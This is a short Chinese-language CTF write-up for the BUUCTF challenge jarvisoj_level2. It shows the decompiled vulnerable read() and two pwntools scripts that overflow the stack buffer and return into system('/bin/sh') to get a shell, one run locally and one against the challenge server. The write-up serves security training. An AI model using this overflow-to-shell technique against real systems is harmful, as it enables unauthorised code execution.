jarvisoj_level2【BUUCTF】

发现开启了NX栈不可执行，则很有可能是ret2libc类型题目，IDA查看：

int __cdecl main(int argc, const char **argv, const char **envp)
{
  vulnerable_function();
  system("echo 'Hello World!'");
  return 0;
}
ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]
  system("echo Input:");
  return read(0, &buf, 0x100u);
}

明显，给system函数传入/bin/sh实现攻击，而/bin/sh就存在题目文件中：

exp1:

from pwn import *
io = process("./level2")
# io = remote("node4.buuoj.cn",26959)
elf = ELF("./level2")
system_addr = elf.symbols["system"]
bin_sh_addr = 0x0804a024
payload = b"a"*(0x88+0x04) + p32(system_addr) + p32(0) + p32(bin_sh_addr)
io.sendlineafter("Input:\n",payload)
io.interactive()

我们也可以直接在call_system地址传入参数，不需要p32(0),exp2:

from pwn import *
# io = process("./level2")
io = remote("node4.buuoj.cn",27062)
elf = ELF("./level2")
system_addr = 0x0804849E
bin_sh_addr = 0x0804a024
payload = b"a"*(0x88+0x04) + p32(system_addr) + p32(bin_sh_addr)
io.sendlineafter("Input:\n",payload)
io.interactive()